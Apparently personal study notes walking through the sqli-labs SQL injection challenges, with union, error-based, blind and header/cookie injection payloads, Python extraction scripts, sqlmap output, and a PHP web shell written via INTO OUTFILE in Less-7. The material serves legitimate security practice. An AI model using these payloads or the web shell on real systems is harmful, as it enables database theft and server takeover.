Notes
Just noticed that buuctf hosts sqli-labs directly, which is kind of neat!
Recently started working through sqli-labs!!!
less1
Starting from the first challenge.
Begin with the simplest probe:
?id=1'
Response:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
Now try ?id=1"
The page renders normally, so the parameter is wrapped in single quotes.
?id=1' order by 4%23
Error, so the query returns three columns (order by 3 succeeds, order by 4 does not).
-1' union select 1,2,3%23
Columns 2 and 3 are echoed on the page.
So use those two slots to dump the database:
-1' union select 1,database(),3%23
Returns security
-1' union select 1,version(),3%23
Returns the database version: 10.2.26-MariaDB-log
-1' union select 1,group_concat(schema_name),3 from information_schema.schemata%23
-1' union select 1,group_concat(table_name),3 from information_schema.tables%23
-1' union select 1,group_concat(column_name),3 from information_schema.columns%23
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='ctftraining' and table_name = 'flag'%23
Grab the flag:
?id=-1' union select 1, group_concat(flag) ,3 from ctftraining.flag%23
Should also spend some time learning sqlmap.
less2
The parameter is numeric this time, so there is no quote to close; otherwise it is identical:
-1 union select 1,group_concat(flag),3 from ctftraining.flag%23
less3
$sql = "select * from users where id = ('$id') limit 0,1"
Enter 1'
Look at the error:
check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1
With the input 1') order by 4%23 the query becomes:
select * from users where id = ('1') order by 4%23') limit 0,1
After that it is exactly the same as Less-1.
The error above looked odd at first, but it is only MariaDB quoting the fragment '1') LIMIT 0,1 that it choked on, which is what produces the doubled quotes.
less4
Try 1"
Error:
the right syntax to use near '"1"") LIMIT 0,1' at line 1
Change the previous challenge's payload to 1") ....
and it works.
less5
Poked around a bit
and nothing is echoed any more, so it's time for blind injection!
Let's get started!
1' and length(database())>8%23
No result!
Together with >7 still returning a row, that pins the database name at 8 characters.
1' and substr(database(),1,1) = 'a'%23
1' and substr((select table_name from information_schema.tables where table_schema = 'ctftraining' limit 0,1),1,1)= 'e'#
Doing this by hand is really tedious...
Script below:
import requests


def determine(text):
    # the page prints "You are in..." only when the injected condition is true
    if 'You are' in text:
        return 1
    else:
        return 0


url = "http://95e07679-ca7b-4f20-a702-b6ba38e85ad7.node3.buuoj.cn/Less-5/"
# crack the database name
print('---------database name---------')
databasename = ''
# lowercase only: '=' is case-insensitive under the default collation, so uppercase
# comes back as lowercase, and digits and '_' are never found at all
aph = "abcdefghijklmnopqrstuvwxyz"
for i in range(8):                      # length 8, determined above
    for j in aph:
        payload = "?id=1' and substr(database(),{},1)='{}'%23".format(i + 1, j)
        s = url + payload
        r = requests.get(s)
        if determine(r.text) == 1:
            databasename += j
            break
print(databasename)

tablename = ""
for i in range(10):
    for j in aph:
        payload = "?id=1' and substr((select table_name from information_schema.tables where table_schema = 'ctftraining' limit 0,1),{},1)='{}'%23".format(i + 1, j)
        s = url + payload
        r = requests.get(s)
        if determine(r.text) == 1:
            tablename += j
            break
print(tablename)
less6
Ran sqlmap and it reports two techniques... to practise, the rest is done by hand.
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=1" AND 4328=4328#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1" AND (SELECT 3689 FROM(SELECT COUNT(*),CONCAT(0x717a626b71,(SELECT (ELT(3689=3689,1))),0x717a767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mUPM
?id=1" and length(database())>8%23
Same as the last one?
Looks like only the single quote changed to a double quote.
less7
The challenge itself says to use outfile.
sqlmap finds the injection point:
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1') AND 6962=6962 AND ('SJWP'='SJWP
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1') AND (SELECT 9272 FROM (SELECT(SLEEP(5)))TRrJ) AND ('NgRV'='NgRV
Next, dump the data.
First enumerate the databases:
import requests


def determine(text):
    if 'You are' in text:
        return 1
    else:
        return 0


url = "http://f5ce892b-71b8-4a78-ac72-7b6d422c73b9.challenge.ctf.show:8080/"
aph = "abcdefghijklmnopqrstuvwxyz"
schemas = ""
for i in range(100):
    for j in aph:
        payload = "?id=1') AND substr((select group_concat(schema_name) from information_schema.schemata),{},1)='{}' AND ('SJWP'='SJWP".format(i + 1, j)
        s = url + payload
        r = requests.get(s)
        if determine(r.text) == 1:
            schemas += j
            print(schemas)
            break

tables = ""   # table names go into their own accumulator
for i in range(100):
    for j in aph:
        payload = "?id=1') AND substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),{},1)='{}' AND ('SJWP'='SJWP".format(i + 1, j)
        s = url + payload
        r = requests.get(s)
        if determine(r.text) == 1:
            tables += j
            print(tables)
            break
emmm, tweak it slightly and it's done.
At this point I realised my script is pretty terrible... uppercase comes back as lowercase and underscores never show up...
Complete overhaul!!!
import requests


def determine(text):
    if 'You are' in text:
        return 1
    else:
        return 0


url = "http://68c4cbfa-6d9e-4ba1-8b45-6ccf70df6a39.challenge.ctf.show:8080/"
schemas = ""
for i in range(100):
    # compare byte values instead of letters: 65..122 is 'A'..'z', which also
    # covers '_' (95), so case and underscores now come out right (digits still don't)
    for j in range(65, 123):
        payload = "?id=1') AND ord(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),{},1))={} AND ('SJWP'='SJWP".format(i + 1, j)
        s = url + payload
        r = requests.get(s)
        if determine(r.text) == 1:
            schemas += chr(j)
            print(schemas)
            break
Much better... but FLAG_COLUMN seems to be empty...
So the problem comes back to outfile.
Write a shell to the server?
So the earlier effort was wasted (not entirely: the script got better).
outfile usage:
select 'shell' into outfile 'path'
emm, where to write to...
/var/www/html/1.php
Give it a try:
http://68c4cbfa-6d9e-4ba1-8b45-6ccf70df6a39.challenge.ctf.show:8080/?id=1') AND select '<?php eval($POST_[cmd]); ?>' into outfile 'C:\\var\www\html\1.php' AND ('SJWP'='SJWP
Could not get it to write no matter what.
Seems you can't run a statement here?
Right: between the AND and the AND only a condition fits, not a SELECT.
Different approach: noticed there should be another ) on the right
that needs closing, so consider union injection instead.
That should work:
?id=1')) union select '<?php eval($POST_[cmd]); ?>' into outfile 'C:\\var\www\html\1.php'%23
Test it:
?id=1')) union select 1,2,3%23
That runs, so tweak it slightly:
?id=1')) union select 1,2, '<?php eval($POST_[cmd]); ?>' into outfile '/tmp/1.php' %23
The path must be wrong. fuck
Maybe I should look up the challenge's web root?
In newer MySQL builds (5.6.34 / 5.7.6 onward) secure_file_priv no longer defaults to empty: depending on the build it is NULL, which disables file writes entirely, or a single allowed directory, and it is read-only at runtime, so no SQL statement can change it. Check that variable before wasting time on paths.
Then discovered it actually had been written, the page just errors out... (the earlier payloads also misspelled $_POST as $POST_; the final payload has it right.)
?id=1')) UNION SELECT 1,2,'<?php eval($_POST[cmd]);?>' into outfile "/var/www/html/4.php";--+
less8
sqlmap couldn't even find an injection point for me.
Quick manual test:
?id=1' union select 1,2,3--+
Uh, no different from ordinary boolean blind...
Nothing more to say about it... ahem.
less9
Quick try:
?id=1' AND if(length(database())>9,sleep(5),1)%23
sqlmap only produces a payload if the technique is forced with --technique=T
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 3399 FROM (SELECT(SLEEP(5)))AtVH) AND 'QcJu'='QcJu
Now for the script!
Idea:
if(substr(database(),1,1)='s',sleep(5),1)
import requests

url = "http://<target>/Less-9/"   # fill in the challenge instance URL

schemas = ""
for i in range(100):
    for j in range(65, 123):      # 'A'..'z', which also covers '_'
        payload = "?id=1' AND if( ord( substr(database(),{},1) ) = {} ,sleep(3),1)%23".format(i + 1, j)
        s = url + payload
        print(s)
        r = requests.get(s)
        # sleep(3) fired if the round trip took noticeably longer than a normal response
        if r.elapsed.total_seconds() >= 2:
            schemas += chr(j)
            print(schemas)
            break
    else:
        break   # no byte value matched: we are past the end of the name
It works, just slow...
and error-prone too... (network jitter)
I really wish I knew multithreading...
Then go and learn it...
Watching sqlmap run, my guess at how its multithreading works:
first determine the length of the value to brute-force,
then spawn a matching number of threads?
yes
Dump the column name FLAG_COLUMN:
import requests

url = "http://<target>/Less-9/"   # same instance as above

column = ""
for i in range(0, 8):
    for j in range(65, 123):
        payload = "?id=1' AND if( ord( substr( (select column_name from information_schema.columns where table_schema = 'ctftraining' and table_name = 'FLAG_TABLE' limit 0,1), {},1 ) ) = {} ,sleep(5),1)%23".format(i + 1, j)
        s = url + payload
        r = requests.get(s)
        if r.elapsed.total_seconds() >= 4:
            column += chr(j)
            print(column)
            break
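As an added example (my code, not part of the original write-up), here is the boolean-blind extraction from the Less-5 and Less-7 scripts restructured the way the multithreading guess above describes: recover the length first, then resolve every character position as an independent job, and replace the per-character alphabet scan with a binary search on ord(), so each byte costs 7 requests instead of up to 58. The target page is replaced by make_oracle(), a constructed stand-in that answers the injected length()/ord(substr()) conditions against a secret string, so the block runs offline. make_oracle, counting, bsearch, extract, the prefix/suffix parameters and the sample secrets are all assumptions of this example, not anything from sqli-labs. Against a real instance, oracle would be a function that GETs url + payload and checks for "You are in"; for Less-9 it would check the elapsed time instead, and nothing else changes.

```python
import re
import threading
from concurrent.futures import ThreadPoolExecutor


def make_oracle(secret):
    """Offline stand-in for the Less-5 page (constructed for this example).

    `secret` plays the role of whatever the subquery returns on the real target
    (database(), a table name, ...).  Returns True where the real page would
    print "You are in...", i.e. where the injected condition is true.
    """
    len_pat = re.compile(r"length\(\(.*\)\)>(\d+)")
    chr_pat = re.compile(r"ord\(substr\(\(.*\),(\d+),1\)\)>(\d+)")

    def oracle(payload):
        m = chr_pat.search(payload)
        if m:
            pos, n = int(m.group(1)), int(m.group(2))
            # MySQL: substr() past the end gives '' and ord('') is 0,
            # so positions beyond the string never compare greater than 0.
            value = ord(secret[pos - 1]) if pos <= len(secret) else 0
            return value > n
        m = len_pat.search(payload)
        if m:
            return len(secret) > int(m.group(1))
        raise ValueError("unrecognised payload: " + payload)

    return oracle


def counting(oracle):
    """Wrap an oracle so the number of requests it answered can be read back."""
    lock = threading.Lock()
    calls = [0]

    def wrapped(payload):
        with lock:
            calls[0] += 1
        return oracle(payload)

    wrapped.calls = calls
    return wrapped


def bsearch(oracle, payload_for, lo, hi):
    """Find the hidden integer v in [lo, hi] given an oracle that answers "v > n".

    Every probe halves the interval, so a byte value in 0..127 costs exactly
    7 requests, whatever the character is.
    """
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(payload_for(mid)):  # True  <=>  v > mid
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(oracle, subquery, prefix="1' and ", suffix="%23", max_len=200, workers=8):
    """Boolean-blind extraction of the value `subquery` evaluates to.

    prefix/suffix are the pieces that close and re-balance the original query:
    "1' and " + "%23" for Less-5, "1') AND " + " AND ('SJWP'='SJWP" for Less-7.
    The length is recovered first; each character position is then an
    independent search, so the positions are resolved in parallel.
    Only single-byte (ASCII) results are handled: MySQL ord() returns a
    multi-byte integer for UTF-8 characters, which this search does not model.
    """
    length = bsearch(
        oracle,
        lambda n: "{}length(({}))>{}{}".format(prefix, subquery, n, suffix),
        0, max_len)

    def char_at(pos):
        code = bsearch(
            oracle,
            lambda n: "{}ord(substr(({}),{},1))>{}{}".format(prefix, subquery, pos, n, suffix),
            0, 127)
        return chr(code)

    with ThreadPoolExecutor(max_workers=workers) as pool:
        return "".join(pool.map(char_at, range(1, length + 1)))


if __name__ == "__main__":
    # Constructed secrets standing in for the challenge's database and table name.
    oracle = counting(make_oracle("security"))
    print(extract(oracle, "select database()"), oracle.calls[0], "requests")
    oracle = counting(make_oracle("FLAG_TABLE"))
    print(extract(oracle, "select table_name from information_schema.tables "
                          "where table_schema='ctftraining' limit 0,1",
                  prefix="1') AND ", suffix=" AND ('SJWP'='SJWP"), oracle.calls[0], "requests")
```

For the 8-character name "security" this costs 8 probes for the length plus 7 per character, 64 requests in total, against up to 8 x 58 for the linear scan; uppercase and underscores come out correctly because the comparison is on byte values, not on letters under a case-insensitive collation. The thread pool only helps against a real server, where the cost is round-trip latency rather than CPU.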
less11
Too easy...
less12
Try the most common one:
") and updatexml(1,concat(0x7e,(select database()),0x7e),1)#
From here it's easy.
less17
UPDATE table SET column = new_value WHERE column = some_value
UPDATE injection: after some thought, can we just append to the end??
update xxx set password = "123456" where username = "admin"
Add:
update xxx set password = "123456" where username = "admin" or 1=1#
So the payload should look like:
username = " or 1=1#
password = 123456
But it does not work...
Damn
emmm, different approach
Go after password instead
123456" AND 1=1#
try
1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)#
emmmm, result...
Data too long for column 'password' at row 8
Hey, looks like there is output
Try again
1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)#
That works
Happy
Note: you must enter a valid username, or nothing comes back at all.
less18
You can see it stores our User-Agent and then returns it to us.
Tried sqlmap, no success...
Probably an INSERT.
So close the quote and go straight to error-based injection? OK:
")and updatexml(1,concat(0x7e,(select database()),0x7e),1)#
emmm, doesn't work
Recall:
INSERT INTO table VALUES (value1, value2, ...)
First the ) has to be closed.
Try stacked queries:
emmm, still nothing... ugh, where's the problem
");updatexml(1,concat(0x7e,(select database()),0x7e),1)#
Maybe the approach is wrong... the injection point
Check how many values there are...
1')%23
Ugh, I was too hasty; now let's actually analyse it.
check the manual that corresponds to your MariaDB server version for the right syntax to use near '%23', '120.36.51.124', 'admin')' at line 1
The error gives the template away: the values are single-quoted, so the ") above never left the string literal, and %23 arrives in the header literally (headers are not URL-decoded), so it is not a comment either. The header's own quote has to be closed and then re-opened at the end. Finally:
1' or updatexml(1,concat(0x7e,database()),0) or '
values( '1 ' or updatexml(1,concat(0x7e,database()),0) or ' ', '120.36.51.124', 'admin')
Interesting.
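An added example (my code, not the write-up's): a small scanner that shows why the earlier Less-18 payloads failed and the last one works. It rebuilds the INSERT the way the error message shows it, with the values single-quoted; the table name uagents and the order of the three values are assumptions, since the page only shows the VALUES tail. It then walks the statement to see whether updatexml( ended up outside a string literal and whether the quotes and parentheses still balance, which is the difference between "no effect", "syntax error" and "updatexml error with the data in it".

```python
# Constructed template: the page's error only shows the tail
# ('%23', '120.36.51.124', 'admin'); the table name is assumed.
TEMPLATE = "INSERT INTO uagents VALUES ('{}', '{}', '{}')"


def build_insert(user_agent, ip, uname):
    """What the server executes: the raw header is concatenated into the literal."""
    return TEMPLATE.format(user_agent, ip, uname)


def sql_shape(sql):
    """Naive scan of a statement's single-quoted literals.

    Returns (text outside literals, literal_terminated, paren_depth).  Inside a
    literal, backslash escapes and doubled '' are honoured; a # outside a
    literal comments out the rest of the statement.  Double-quoted literals
    are not modelled because this template only uses single quotes.
    """
    outside, in_str, depth, i = [], False, 0, 0
    while i < len(sql):
        c = sql[i]
        if in_str:
            if c == "\\":
                i += 2                          # skip the escaped character
                continue
            if c == "'":
                if sql[i + 1:i + 2] == "'":     # '' is an escaped quote
                    i += 2
                    continue
                in_str = False
            i += 1
            continue
        if c == "'":
            in_str = True
        elif c == "#":
            break                               # comment to end of statement
        else:
            if c == "(":
                depth += 1
            elif c == ")":
                depth -= 1
            outside.append(c)
        i += 1
    return "".join(outside), not in_str, depth


def analyse(user_agent, ip="120.36.51.124", uname="admin"):
    """Does the header break out of the literal, and is the result still parseable?"""
    sql = build_insert(user_agent, ip, uname)
    outside, terminated, depth = sql_shape(sql)
    return {
        "sql": sql,
        "breaks_out": "updatexml(" in outside,   # the call lands in SQL, not in a string
        "balanced": terminated and depth == 0,   # otherwise MySQL reports a syntax error
    }


if __name__ == "__main__":
    for ua in (
        '")and updatexml(1,concat(0x7e,(select database()),0x7e),1)#',  # stays inside the literal
        "1')%23",                                                        # header is not URL-decoded
        "1' or updatexml(1,concat(0x7e,database()),0)#",                 # breaks out, but unbalanced
        "1' or updatexml(1,concat(0x7e,database()),0) or '",             # breaks out and re-balances
    ):
        r = analyse(ua)
        print(r["breaks_out"], r["balanced"], r["sql"])
```

The first header is swallowed whole as a string (a harmless INSERT), the second leaves a dangling quote (the syntax error the page showed), the third breaks out but leaves VALUES( unclosed behind the comment, and only the fourth both breaks out and re-balances, so updatexml() actually runs.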
less19
Same as the last one, just in the Referer header instead.
less20
Not quite like the previous two.
There seems to be no output any more.
So need to think carefully about how to attack it.
sqlmap found nothing (maybe I'm just too bad at using it...)
cao, why does buuctf's less20 have no output
while ctfshow's does...
Fine. Let's analyse.
emmm, first it records uname; the User-Agent is probably stored too.
First test whether the UA header is injectable.
Changed the UA header directly; it always returns I love your cookie.
A bit annoying...
Then noticed there are two requests, and the second one decides the response!
GET /index.php HTTP/1.1
Host: dbf27bb7-6115-41e0-a267-4b0ef8d362d0.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://burpsuite/
Connection: close
Cookie: UM_distinctid=178bf923ef674-07363e7c62faa1-4c3f237d-144000-178bf923ef76fa; uname=admin
Upgrade-Insecure-Requests: 1
And the cookie here carries a uname. No wonder sqlmap got nothing: I only gave it the first request...
This time try changing the UA header in the second request.
Tried it; the UA header seems not injectable this time.
So try the cookie...
Changed the cookie and errors appear, promising:
Cookie: UM_distinctid=178bf923ef674-07363e7c62faa1-4c3f237d-144000-178bf923ef76fa; uname=admin'
Done:
Cookie: UM_distinctid=178bf923ef674-07363e7c62faa1-4c3f237d-144000-178bf923ef76fa; uname=admin'+and+updatexml(1,concat(0x7e,(select database()),0x7e),1)+and+'
Found the right way to use sqlmap (feed it the second request, the one carrying the cookie):
Parameter: uname (Cookie)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: UM_distinctid=178bf923ef674-07363e7c62faa1-4c3f237d-144000-178bf923ef76fa; uname=admin' AND 8192=8192 AND 'nKOx'='nKOx
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: UM_distinctid=178bf923ef674-07363e7c62faa1-4c3f237d-144000-178bf923ef76fa; uname=admin' AND (SELECT 5017 FROM(SELECT COUNT(*),CONCAT(0x71787a6271,(SELECT (ELT(5017=5017,1))),0x716a6a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'MBUd'='MBUd
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
Payload: UM_distinctid=178bf923ef674-07363e7c62faa1-4c3f237d-144000-178bf923ef76fa; uname=admin' OR SLEEP(5) AND 'oQjC'='oQjC
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: UM_distinctid=178bf923ef674-07363e7c62faa1-4c3f237d-144000-178bf923ef76fa; uname=-8022' UNION ALL SELECT NULL,NULL,CONCAT(0x71787a6271,0x4662706a53565a626e576354526f686b44586c635746476e6a784864516e6b48556843596a4e476a,0x716a6a7071)-- -
Everything can be dumped directly.